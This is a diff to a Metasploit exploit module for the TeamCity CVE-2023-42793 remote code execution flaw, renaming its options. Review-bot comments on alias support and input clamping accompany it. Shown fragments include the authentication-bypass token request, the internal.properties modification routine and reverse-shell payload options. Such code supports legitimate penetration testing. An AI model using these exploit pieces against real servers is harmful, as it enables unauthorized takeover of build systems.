diff --git a/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md b/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md
index da87c5bdc6f6..83074af4de1a 100644
--- a/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md
+++ b/documentation/modules/exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793.md
@@ -39,16 +39,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
 Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
- RPORT 8111 yes The target port (TCP)
- SSL false no Negotiate SSL/TLS for outgoing connections
- TeamCityAdminID 1 yes The ID of an administrator account to authenticate as
- TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file
- TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file
- VHOST no HTTP server virtual host
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+ RPORT 8111 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
+ TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file
+ TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file
+ VHOST no HTTP server virtual host
 Payload options (cmd/windows/http/x64/meterpreter/reverse_tcp):
@@ -118,16 +118,16 @@ msf6 exploit(multi/http/jetbrains_teamcity_rce_cve_2023_42793) > show options
 Module options (exploit/multi/http/jetbrains_teamcity_rce_cve_2023_42793):
- Name Current Setting Required Description
- ---- --------------- -------- -----------
- Proxies no A proxy chain of format type:host:port[,type:host:port][...]
- RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
- RPORT 8111 yes The target port (TCP)
- SSL false no Negotiate SSL/TLS for outgoing connections
- TeamCityAdminID 1 yes The ID of an administrator account to authenticate as
- TeamCityRetryCount 10 yes The number of times to retry reading the internal.properties file
- TeamCityRetryWait 3 yes The number of seconds to wait between retry reading the internal.properties file
- VHOST no HTTP server virtual host
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS 192.168.86.43 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
+ RPORT 8111 yes The target port (TCP)
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ TEAMCITY_ADMIN_ID 1 yes The ID of an administrator account to authenticate as
+ TEAMCITY_RETRY_COUNT 10 yes The number of times to retry reading the internal.properties file
+ TEAMCITY_RETRY_WAIT 3 yes The number of seconds to wait between retry reading the internal.properties file
+ VHOST no HTTP server virtual host
 Payload options (cmd/linux/http/x64/meterpreter/reverse_tcp):
diff --git a/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb b/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb
index a05ac5c1cb2e..f880a741688d 100644
--- a/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb
+++ b/modules/exploits/multi/http/jetbrains_teamcity_rce_cve_2023_42793.rb
@@ -62,10 +62,10 @@ def initialize(info = {})
 # By default TeamCity listens for HTTP requests on TCP port 8111.
 Opt::RPORT(8111),
 # The first user created during installation is an administrator account, so the ID will be 1.
- OptInt.new('TeamCityAdminID', [true, 'The ID of an administrator account to authenticate as', 1]),
+ OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1]),
 # We modify a configuration file, we need to wait for the changes to be picked up. These options govern how we wait.
- OptInt.new('TeamCityRetryCount', [true, 'The number of times to retry reading the internal.properties file', 10]),
- OptInt.new('TeamCityRetryWait', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3])
+ OptInt.new('TEAMCITY_RETRY_COUNT', [true, 'The number of times to retry reading the internal.properties file', 10]),
+ OptInt.new('TEAMCITY_RETRY_WAIT', [true, 'The number of seconds to wait between retry reading the internal.properties file', 3])
 ]
 )
 end
@@ -95,7 +95,7 @@ def check
 end
 def exploit
- token_uri = "/app/rest/users/id:#{datastore['TeamCityAdminID']}/tokens/RPC2"
+ token_uri = "/app/rest/users/id:#{datastore['TEAMCITY_ADMIN_ID']}/tokens/RPC2"
 res = send_request_cgi(
 'method' => 'POST',
@@ -121,9 +121,9 @@ def exploit
 unless res&.code == 200
 # One reason token creation may fail is if we use a user ID for a user that does not exist. We detect that here
- # and instruct the user to choose a new ID via the TeamCityAdminID option.
+ # and instruct the user to choose a new ID via the TEAMCITY_ADMIN_ID option.
 if res && (res.code == 404) && res.body.include?('User not found')
- print_warning('User not found, try setting the TeamCityAdminID option to a different ID.')
+ print_warning('User not found, try setting the TEAMCITY_ADMIN_ID option to a different ID.')
 end
 fail_with(Failure::UnexpectedReply, 'Failed to create an authentication token.')
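Review bot: The three `OptInt.new` lines retire the old option names without registering them as aliases. A saved resource script or `setg` that still uses `TeamCityAdminID`, `TeamCityRetryCount` or `TeamCityRetryWait` would then set a key the module no longer reads, and the run would proceed on the defaults without any message. Metasploit options accept an `aliases:` keyword, so `OptInt.new('TEAMCITY_ADMIN_ID', [true, 'The ID of an administrator account to authenticate as', 1], aliases: ['TeamCityAdminID'])` (and the same for the two retry options) should keep existing configurations working. The `datastore[...]` reads in the `exploit` and `modify_internal_properties` hunks depend on the same names. `initialize` begins and ends outside this hunk.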
@@ -219,15 +219,15 @@ def modify_internal_properties(token, key, value)
 unless res&.code == 200
 # If we are using an authentication for a non admin user, we cannot modify the internal.properties file. The
- # server will return a 302 redirect if this is the case. Choose a different TeamCityAdminID and try again.
+ # server will return a 302 redirect if this is the case. Choose a different TEAMCITY_ADMIN_ID and try again.
 if res&.code == 302
- print_warning('This user is not an administrator, try setting the TeamCityAdminID option to a different ID.')
+ print_warning('This user is not an administrator, try setting the TEAMCITY_ADMIN_ID option to a different ID.')
 end
 return false
 end
- 0.upto datastore['TEAMCITY_RETRY_COUNT_PLACEHOLDER_DO_NOT_USE'] do
+ 0.upto datastore['TEAMCITY_RETRY_COUNT'] do
 res = send_request_cgi(
 'method' => 'GET',
 'uri' => normalize_uri('/admin/admin.html'),
@@ -249,7 +249,7 @@ def modify_internal_properties(token, key, value)
 print_status('Waiting for config change to be picked up...')
- sleep(datastore['TeamCityRetryWait'])
+ sleep(datastore['TEAMCITY_RETRY_WAIT'])
 end
 true
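Review bot: `datastore['TEAMCITY_RETRY_COUNT']` and `datastore['TEAMCITY_RETRY_WAIT']` go straight into `0.upto` and `sleep` with no range check, and both are plain `OptInt`s that accept negative values. A negative wait makes `sleep` raise `ArgumentError`, and a negative count runs the loop zero times, after which the method appears (from the tail shown in the second hunk) to fall through to `true` without ever reading the file back. Clamping the values on read, e.g. `retries = [datastore['TEAMCITY_RETRY_COUNT'], 0].max` and `sleep([datastore['TEAMCITY_RETRY_WAIT'], 0].max)`, would avoid both. A one-line comment on the `0.upto` line saying it performs the initial read plus that many retries would also help. Most of the loop body lies between the two hunks and is not visible here.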